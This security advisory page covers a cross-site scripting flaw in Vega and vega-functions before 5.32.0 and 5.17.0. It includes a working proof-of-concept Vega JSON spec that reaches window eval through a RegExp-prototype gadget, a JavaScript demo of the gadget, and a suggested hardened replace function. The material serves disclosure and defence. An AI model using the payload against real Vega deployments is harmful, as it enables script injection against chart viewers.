exploitDog

GHSA-963h-3v39-3pqf

Published: 27 Mar 2025
Source: github
GitHub: reviewed
CVSS4: 5.3

Description

Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]

Impact

Anyone who renders attacker-supplied Vega/Vega-Lite JSON definitions can end up executing unexpected JavaScript when the graph is drawn, unless the library is used with vega-interpreter.

Workarounds

Use vega together with the expression interpreter (vega-interpreter). The upstream description names this as the workaround, and deployments that already run with vega-interpreter are not affected.

POC Summary

Calling replace with a RegExp-like pattern (any object that inherits from RegExp.prototype) makes String.prototype.replace dispatch to RegExp.prototype[@@replace], which in turn calls the pattern's exec method without checking that the pattern is a real RegExp; that exec is attacker-controlled.

POC Details

Consider the call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). /h/.constructor.prototype is RegExp.prototype, so the pattern inherits RegExp.prototype[@@replace]; String.prototype.replace hands the work to that method, which ends up calling pattern.exec('foo'). global: false keeps this to a single exec call rather than a lastIndex-driven loop.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since Vega expressions cannot produce a function value of their own, an attacker who wants to escalate this to XSS needs an existing callable to use as exec. The PoC takes it from event.view, which for a DOM mouse event is the Window object, and uses that window's eval.

Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}
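The gadget described above, and the check a practitioner would put in front of it, as an added JavaScript example. This is not code from Vega, vega-functions or the advisory: replaceUnsafe is an assumed stand-in for the vulnerable helper (it only forwards to String.prototype.replace), replaceSafe and isGenuineRegExp are a hardening suggestion rather than the upstream fix, and makeGadget, demoGadget and demoAssignedExec are illustration names. It runs stand-alone in Node with no DOM, so a recording stub takes the place of event.view.eval.

```javascript
// Added example, not code from Vega or from the advisory. replaceUnsafe() is
// an ASSUMED stand-in for the vulnerable vega-functions `replace` helper: it
// forwards to String.prototype.replace, which is all the gadget needs.
function replaceUnsafe(str, pattern, replacement) {
  return String(str).replace(pattern, replacement);
}

// The gadget from the advisory: a plain object whose prototype is
// RegExp.prototype. String.prototype.replace looks up pattern[Symbol.replace],
// finds RegExp.prototype[@@replace] through the prototype chain, and that
// method calls pattern.exec(str) without checking that the receiver is a real
// RegExp. `global: false` limits it to a single exec call. `flags: ''` is not
// in the advisory's payload; it is added so the object also satisfies engines
// that read rx.flags rather than rx.global when deciding whether to loop.
function makeGadget(exec) {
  return { __proto__: /h/.constructor.prototype, exec, global: false, flags: '' };
}

// In the advisory the exec slot is event.view.eval, so the first argument of
// replace() is evaluated as JavaScript. Here a recording stub stands in for it.
function demoGadget() {
  const evaluated = [];
  const fakeEval = (code) => { evaluated.push(code); return null; }; // null = "no match"
  const out = replaceUnsafe('alert(1)', makeGadget(fakeEval), '');
  return { out, evaluated }; // out: 'alert(1)' (unchanged), evaluated: ['alert(1)']
}

// Brand check. The `source` accessor of RegExp.prototype throws a TypeError
// unless its receiver carries the RegExp internal slots (RegExp.prototype
// itself is the one exception and is excluded explicitly). A plain object
// cannot fake an internal slot, whatever its prototype is. Node's
// util.types.isRegExp performs the same slot check natively.
const regexpSource = Object.getOwnPropertyDescriptor(RegExp.prototype, 'source').get;
const regexpFlags = Object.getOwnPropertyDescriptor(RegExp.prototype, 'flags').get;

function isGenuineRegExp(value) {
  if (value === RegExp.prototype) return false;
  try {
    regexpSource.call(value);
    return true;
  } catch {
    return false;
  }
}

// Hardened stand-in (a suggestion, not the upstream fix): accept only strings
// and genuine RegExps, and rebuild a RegExp from its internal slots so that no
// own property of the caller's object (an assigned `exec`, say) takes part in
// the replacement. The replacement value is coerced to a string for the same
// reason.
function replaceSafe(str, pattern, replacement) {
  let pat;
  if (typeof pattern === 'string') {
    pat = pattern;
  } else if (isGenuineRegExp(pattern)) {
    pat = new RegExp(regexpSource.call(pattern), regexpFlags.call(pattern));
  } else {
    throw new TypeError('replace(): pattern must be a string or a RegExp');
  }
  return String(str).replace(pat, String(replacement));
}

// A genuine RegExp with an own `exec` is the variant the brand check alone
// would miss; rebuilding the RegExp from its slots handles it.
function demoAssignedExec() {
  const calls = [];
  const rx = /o/g;
  rx.exec = (s) => { calls.push(s); return null; };
  const unsafe = replaceUnsafe('foo', rx, '0'); // hijacked exec: 'foo' unchanged
  const safe = replaceSafe('foo', rx, '0');     // 'f00'; rx.exec is not consulted
  return { unsafe, safe, calls };
}
```

The slot check is realm-independent, so a RegExp created in another frame still passes, while RegExp.prototype itself (which the source getter tolerates) is rejected explicitly.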

Packages

Name: vega (npm)
Affected versions: < 5.32.0
Fixed version: 5.32.0

Name: vega-functions (npm)
Affected versions: < 5.17.0
Fixed version: 5.17.0

EPSS

Percentile: 61%
Score: 0.00413 (Low)

CVSS4: 5.3 Medium

Weaknesses

CWE-79
CWE-87

Related vulnerabilities

ubuntu
11 months ago

Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. In Vega prior to version 5.32.0, corresponding to vega-functions prior to version 5.17.0, users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library was used with the `vega-interpreter`. Vega version 5.32.0 and vega-functions version 5.17.0 fix the issue. As a workaround, use `vega` with expression interpreter.

nvd
11 months ago

Same description as the Ubuntu entry above.

debian
11 months ago

Vega is a visualization grammar, a declarative format for creating, sa ...
